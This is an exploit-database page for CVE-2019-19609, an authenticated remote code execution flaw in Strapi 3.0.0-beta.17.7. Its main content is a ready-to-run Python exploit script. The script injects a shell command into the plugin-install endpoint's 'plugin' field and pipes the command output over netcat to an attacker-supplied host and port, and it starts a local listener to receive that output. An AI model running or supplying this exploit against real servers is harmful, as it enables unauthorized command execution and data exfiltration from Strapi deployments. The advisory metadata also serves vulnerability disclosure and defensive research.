Strapi 3.0.0-beta.17.7 Remote Code Execution

2021.08.31
Credit: David Uton
Risk: High
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated) # Date: 29/08/2021 # Exploit Author: David Utón (M3n0sD0n4ld) # Vendor Homepage: https://strapi.io/ # Affected Version: strapi-3.0.0-beta.17.7 and earlier # Tested on: Linux Ubuntu 18.04.5 LTS # CVE : CVE-2019-19609 #!/usr/bin/python3 # Author: @David_Uton (m3n0sd0n4ld) # Github: https://m3n0sd0n4ld.github.io # Usage: python3 CVE-2019-19609.py http[s]//IP[:PORT] TOKEN_JWT COMMAND LHOST import requests, sys, os, socket logoType = (''' ===================================== CVE-2019-19609 - Strapi RCE ------------------------------------- @David_Uton (M3n0sD0n4ld) https://m3n0sd0n4ld.github.io/ ===================================== ''') if __name__ == '__main__': # Parameter checking if len(sys.argv) != 5: print(logoType) print("[!] Some of these parameters are missing.") print(''' Use: python3 %s http[s]//IP[:PORT] TOKEN_JWT COMMAND LHOST Example: python3 10.10.10.10 eyJHbGCi..... "id" 127.0.0.1''' % sys.argv[0]) # Exploit run else: # Paremeters url = sys.argv[1] token = sys.argv[2] command = sys.argv[3] lhost = sys.argv[4] lport = 9999 s = requests.session() r = s.post(url, verify=False) # SSL == verify=True headersData = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Authorization': "Bearer %s" % token } postData = { "plugin":"documentation && $(%s > /tmp/.m3 && nc %s %s < /tmp/.m3 | rm /tmp/.m3)" % (command, lhost, lport) } print(logoType) os.system("nc -nvlp 9999 &") try: print("[+] Successful operation!!!") r = s.post(url + "/admin/plugins/install", headers=headersData, data=postData, verify=False) # SSL == verify=True # Content print print(r.text) except: print("[!] An error occurred, try again.") sys.exit(1)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top